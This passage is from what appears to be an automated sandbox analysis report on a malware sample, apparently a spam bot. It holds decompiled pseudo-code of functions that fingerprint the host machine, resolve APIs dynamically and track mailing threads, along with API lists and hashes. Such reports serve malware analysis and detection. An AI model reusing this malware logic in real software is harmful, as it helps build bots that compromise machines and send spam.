                                                                                                                                  • Instruction Fuzzy Hash: E121B432614215AFDB10CFA8E985A9FBBB9FB05311B2540ABE806E7311DB39EE40D754
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADC235 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 2424974917-3142137124
                                                                                                                                  • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                                                                  • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004038F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}








                                                                                                                                  0x004038fa
                                                                                                                                  0x00403989
                                                                                                                                  0x0040398b
                                                                                                                                  0x0040398b
                                                                                                                                  0x00403905
                                                                                                                                  0x0040390b
                                                                                                                                  0x00403911
                                                                                                                                  0x00403982
                                                                                                                                  0x00403982
                                                                                                                                  0x00000000
                                                                                                                                  0x00403913
                                                                                                                                  0x0040391b
                                                                                                                                  0x00403924
                                                                                                                                  0x00403926
                                                                                                                                  0x0040392e
                                                                                                                                  0x00403930
                                                                                                                                  0x00403930
                                                                                                                                  0x00403933
                                                                                                                                  0x00403935
                                                                                                                                  0x00403935
                                                                                                                                  0x0040393b
                                                                                                                                  0x0040393b
                                                                                                                                  0x0040393e
                                                                                                                                  0x00403947
                                                                                                                                  0x0040394b
                                                                                                                                  0x0040394c
                                                                                                                                  0x0040394f
                                                                                                                                  0x00403952
                                                                                                                                  0x00403958
                                                                                                                                  0x0040395a
                                                                                                                                  0x00403964
                                                                                                                                  0x00403966
                                                                                                                                  0x0040396b
                                                                                                                                  0x0040396b
                                                                                                                                  0x00403964
                                                                                                                                  0x00403958
                                                                                                                                  0x00403975
                                                                                                                                  0x00403978
                                                                                                                                  0x0040397b
                                                                                                                                  0x00000000
                                                                                                                                  0x00403981

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                                                                    • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 3716169038-2903620461
                                                                                                                                  • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                                                                  • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                                                                  • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD709D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00AD70BC
                                                                                                                                  • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 00AD70F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountLookupUser
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 2370142434-2343686810
                                                                                                                                  • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction ID: dd4080308f00e6ae28771862cb43e19e145afb776af20ce7f1bbe6a0f1d66188
                                                                                                                                  • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                                                                  • Instruction Fuzzy Hash: B2112A72904118EBDF15CBD4DC85ADEB7BCBB04301F1443A6E502E62A0E7709F888BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                  			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                                                                  0x00401b7e
                                                                                                                                  0x00401b84
                                                                                                                                  0x00401b85
                                                                                                                                  0x00401b86
                                                                                                                                  0x00401b87
                                                                                                                                  0x00401b89
                                                                                                                                  0x00401b8c
                                                                                                                                  0x00401b8d
                                                                                                                                  0x00401b94
                                                                                                                                  0x00401ba3
                                                                                                                                  0x00401bb8
                                                                                                                                  0x00401bc8
                                                                                                                                  0x00401bca
                                                                                                                                  0x00401bcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00401bd8
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401BA3
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2777991786-1857712256
                                                                                                                                  • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                                                                  • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                                                                  • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AB81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x413640);
							} else {
								_t17 = InterlockedIncrement(0x41363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}







                                                                                                                                  0x0040ab85
                                                                                                                                  0x0040ab8a
                                                                                                                                  0x0040ab94
                                                                                                                                  0x0040ab97
                                                                                                                                  0x0040ab9a
                                                                                                                                  0x0040aba0
                                                                                                                                  0x0040abab
                                                                                                                                  0x0040abb9
                                                                                                                                  0x0040abc4
                                                                                                                                  0x0040abca
                                                                                                                                  0x0040abd3
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abd5
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe1
                                                                                                                                  0x0040abe3
                                                                                                                                  0x0040abe4
                                                                                                                                  0x00000000
                                                                                                                                  0x0040abea
                                                                                                                                  0x0040abed

                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                                                                  • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IncrementInterlockedlstrcpyn
                                                                                                                                  • String ID: %FROM_EMAIL
                                                                                                                                  • API String ID: 224340156-2903620461
                                                                                                                                  • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                                                                  • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                                                                  • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004026B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                                                                  • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbyaddrinet_ntoa
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 2112563974-1857712256
                                                                                                                                  • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                                                                  • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                                                                  • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: gethostbynameinet_addr
                                                                                                                                  • String ID: time_cfg
                                                                                                                                  • API String ID: 1594361348-2401304539
                                                                                                                                  • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                                                                  • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                                                                  • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4;
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                                                                  0x0040eae4
                                                                                                                                  0x0040eaeb
                                                                                                                                  0x0040eb02
                                                                                                                                  0x0040eb0d
                                                                                                                                  0x0040eaed
                                                                                                                                  0x0040eaf2
                                                                                                                                  0x0040eaf8
                                                                                                                                  0x0040eaff
                                                                                                                                  0x00000000
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eb01
                                                                                                                                  0x0040eaff

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000), ref: 0040EAF2
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: ntdll.dll
                                                                                                                                  • API String ID: 2574300362-2227199552
                                                                                                                                  • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                                                                  • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                                                                  • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
								E0040EE08(_a12, _t120, _t72 - _t102 + 1);
								_t76 =  &_v368;
								_t124 = _t123 + 0xc;
								_t103 = _t76 + 1;
								do {
									_t111 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t111 != 0);
								goto L23;
							} else {
								goto L14;
							}
							do {
								L14:
								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
									_t32 = _t99 + 1; // 0x1
									_t118 = _t32;
								}
								_t99 = _t99 + 1;
							} while (_t99 < _t64);
							goto L17;
							L23:
							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);
							_a12 = _a12 + 0x100;
							_t122 = _t124 + 0xc;
							_v8 = _v8 + 1;
							_t64 =  *_t116 - 1;
						} while (_v8 < _t64);
						goto L24;
					}
					_t3 = _t117 + 8; // 0x8
					_t105 = _t3;
					_t87 = _t3;
					_t4 = _t87 + 1; // 0x9
					_t115 = _t4;
					do {
						_t96 =  *_t87;
						_t87 = _t87 + 1;
					} while (_t96 != 0);
					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
					 *_t116 =  *_t116 + 1;
					HeapFree(GetProcessHeap(), 0, _t117);
					goto L24;
				}
				return 0;
			}

































                                                                                                                                  0x00402f2e
                                                                                                                                  0x00402f34
                                                                                                                                  0x00402f36
                                                                                                                                  0x00402f3d
                                                                                                                                  0x00402f42
                                                                                                                                  0x00402f4d
                                                                                                                                  0x00402f88
                                                                                                                                  0x00402f8b
                                                                                                                                  0x00402f8e
                                                                                                                                  0x00402f93
                                                                                                                                  0x00402f93
                                                                                                                                  0x00402f96
                                                                                                                                  0x00402f98
                                                                                                                                  0x00402f9b
                                                                                                                                  0x00402f9e
                                                                                                                                  0x00402f9e
                                                                                                                                  0x00402fa0
                                                                                                                                  0x00402fa1
                                                                                                                                  0x00402fae
                                                                                                                                  0x00402fb3
                                                                                                                                  0x00402fb7
                                                                                                                                  0x00402fbe
                                                                                                                                  0x00402fc1
                                                                                                                                  0x00402fc3
                                                                                                                                  0x00402fc5
                                                                                                                                  0x00402fca
                                                                                                                                  0x00402fcd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402fcd
                                                                                                                                  0x00402fdb
                                                                                                                                  0x00402fe3
                                                                                                                                  0x00402fe8
                                                                                                                                  0x004030ad
                                                                                                                                  0x00000000
                                                                                                                                  0x004030af
                                                                                                                                  0x00402ff3
                                                                                                                                  0x00402ff4
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402ff9
                                                                                                                                  0x00402ffd
                                                                                                                                  0x00403001
                                                                                                                                  0x00403017
                                                                                                                                  0x0040301a
                                                                                                                                  0x00403021
                                                                                                                                  0x00403028
                                                                                                                                  0x0040302b
                                                                                                                                  0x0040302e
                                                                                                                                  0x00403031
                                                                                                                                  0x00403034
                                                                                                                                  0x00403034
                                                                                                                                  0x00403036
                                                                                                                                  0x00403037
                                                                                                                                  0x00403049
                                                                                                                                  0x00403051
                                                                                                                                  0x00403054
                                                                                                                                  0x00403057
                                                                                                                                  0x00403059
                                                                                                                                  0x0040305c
                                                                                                                                  0x0040305c
                                                                                                                                  0x0040305e
                                                                                                                                  0x0040305f
                                                                                                                                  0x0040306b
                                                                                                                                  0x00403070
                                                                                                                                  0x00403076
                                                                                                                                  0x00403079
                                                                                                                                  0x0040307c
                                                                                                                                  0x0040307c
                                                                                                                                  0x0040307e
                                                                                                                                  0x0040307f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00403003
                                                                                                                                  0x00403003
                                                                                                                                  0x0040300d
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x0040300f
                                                                                                                                  0x00403012
                                                                                                                                  0x00403013
                                                                                                                                  0x00000000
                                                                                                                                  0x00403083
                                                                                                                                  0x0040308f
                                                                                                                                  0x00403094
                                                                                                                                  0x0040309d
                                                                                                                                  0x004030a0
                                                                                                                                  0x004030a3
                                                                                                                                  0x004030a4
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ff7
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f4f
                                                                                                                                  0x00402f52
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f54
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f57
                                                                                                                                  0x00402f59
                                                                                                                                  0x00402f5a
                                                                                                                                  0x00402f66
                                                                                                                                  0x00402f6e
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000
                                                                                                                                  0x00402f7a
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,7620EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                                                                    • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00402F7A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1017166417-0
                                                                                                                                  • Opcode ID: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                                                                  • Opcode Fuzzy Hash: 3f77e5f90a98cb00e4cd81c42479f24e3707705fbe302646911da8b0c8861fdf
                                                                                                                                  • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD3189 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00AD2F88: GetModuleHandleA.KERNEL32(?), ref: 00AD2FA1
                                                                                                                                    • Part of subcall function 00AD2F88: LoadLibraryA.KERNEL32(?), ref: 00AD2FB1
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD31DA
                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00AD31E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
